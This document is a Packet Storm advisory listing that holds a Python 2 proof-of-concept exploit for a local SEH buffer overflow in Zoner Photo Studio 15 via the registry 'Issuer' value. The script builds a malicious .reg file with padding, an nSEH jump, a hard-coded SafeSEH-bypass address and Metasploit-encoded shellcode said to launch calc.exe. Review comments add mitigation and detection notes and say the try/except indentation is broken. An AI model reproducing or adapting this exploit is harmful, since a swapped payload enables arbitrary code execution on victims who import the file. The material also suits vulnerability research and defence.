Zoner Photo Studio 15 Build 3 Registry Value Parsing

2012-11-12T00:00:00
ID PACKETSTORM:118029
Type packetstorm
Reporter Julien Ahrens
Modified 2012-11-12T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: Zoner Photo Studio v15 Build 3 (Zps.exe) Registry Value Parsing Local Buffer Overflow  
# Version: 15 Build 3, Build 2  
# Date: 2012-11-09  
# Author: Julien Ahrens  
# Homepage: http://www.inshell.net  
# Software Link: http://www.zoner.com  
# Tested on: Windows XP SP3 Professional German  
# Notes: -  
# Howto: Import Reg -> Start App  
  
from struct import pack  
  
# Name of the registry import file this script writes into the current
# directory. The identifier shadows the Python 2 builtin `file`.
file="poc.reg"

# Components of the oversized "Issuer" value, concatenated further down in this
# order: junk1, nseh, eip, nops, shellcode, junk2.
#   junk1 - 2136 bytes of 0xCC (x86 INT3) used as filler.
#   nseh  - 4 bytes: EB 06 (x86 short jump, +6) followed by two NOPs.
#   eip   - the hard-coded address packed as 4 little-endian bytes.
# The names nseh/eip and the author's SafeSEH remark suggest the overflow
# reaches a structured-exception-handler record; this is inferred from naming,
# because the vulnerable parsing code in Zps.exe is not shown on this page.
junk1="\xCC" * 2136
nseh="\xeb\x06\x90\x90"
# NOTE(review): the author describes the target address as lying in a
# read/write page, which would explain why SafeSEH is not applied to it.
# Enforcing DEP for the process and enabling SEHOP where the OS offers it are
# the generic mitigations for this technique; neither is verified against this
# build here. The address is specific to the tested environment named in the
# file header (Windows XP SP3 Professional German).
eip=pack('<L',0x0C7D8F13) # JMP DWORD PTR SS:[EBP-18] - Access: (PAGE_READWRITE) [SafeSEH Bypass]
nops="\x90" * 10
junk2="\xCC" * 1000

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d\x22\x93'

# 227 encoded bytes. Because they are encoded, their behaviour cannot be
# confirmed by reading this listing; the "launches calc.exe" description comes
# solely from the author's comments above.
shellcode = ("\xbd\x55\xd9\x54\xcd\xdb\xdc\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x33\x31\x6a\x12\x03\x6a\x12\x83\x97\xdd\xb6\x38\xeb" +
"\x36\xbf\xc3\x13\xc7\xa0\x4a\xf6\xf6\xf2\x29\x73\xaa\xc2" +
"\x3a\xd1\x47\xa8\x6f\xc1\xdc\xdc\xa7\xe6\x55\x6a\x9e\xc9" +
"\x66\x5a\x1e\x85\xa5\xfc\xe2\xd7\xf9\xde\xdb\x18\x0c\x1e" +
"\x1b\x44\xff\x72\xf4\x03\x52\x63\x71\x51\x6f\x82\x55\xde" +
"\xcf\xfc\xd0\x20\xbb\xb6\xdb\x70\x14\xcc\x94\x68\x1e\x8a" +
"\x04\x89\xf3\xc8\x79\xc0\x78\x3a\x09\xd3\xa8\x72\xf2\xe2" +
"\x94\xd9\xcd\xcb\x18\x23\x09\xeb\xc2\x56\x61\x08\x7e\x61" +
"\xb2\x73\xa4\xe4\x27\xd3\x2f\x5e\x8c\xe2\xfc\x39\x47\xe8" +
"\x49\x4d\x0f\xec\x4c\x82\x3b\x08\xc4\x25\xec\x99\x9e\x01" +
"\x28\xc2\x45\x2b\x69\xae\x28\x54\x69\x16\x94\xf0\xe1\xb4" +
"\xc1\x83\xab\xd2\x14\x01\xd6\x9b\x17\x19\xd9\x8b\x7f\x28" +
"\x52\x44\x07\xb5\xb1\x21\xf7\xff\x98\x03\x90\x59\x49\x16" +
"\xfd\x59\xa7\x54\xf8\xd9\x42\x24\xff\xc2\x26\x21\xbb\x44" +
"\xda\x5b\xd4\x20\xdc\xc8\xd5\x60\xbf\x8f\x45\xe8\x6e\x2a" +
"\xee\x8b\x6e")

# Build the .reg text: the version banner, the per-user key, then the "Issuer"
# string value holding the whole buffer (more than 3,000 bytes, mostly
# non-printable).
# Detection note: the key is under HKEY_CURRENT_USER, so the import needs no
# elevation. A .reg file or registry write that sets this value to several
# kilobytes of binary data is a usable indicator; a certificate issuer field
# would presumably hold short printable text (confirm against a clean install).
# NOTE(review): the key path relies on Python leaving the unrecognised escapes
# \S, \Z, \P and \C untouched; a raw string would state that intent explicitly.
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\ZONER\Zoner Photo Studio 15\Preferences\Certificate]\n"
poc=poc + "\"Issuer\"=\"" + junk1 + nseh + eip + nops + shellcode + junk2 + "\""

# Write the assembled text to disk and report the outcome on stdout.
# NOTE(review): the indentation of the try/except bodies was lost in this
# listing, so the lines below do not parse as shown. The bare `except:` also
# hides the real error, and the handle is not closed if write() raises.
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";
  
`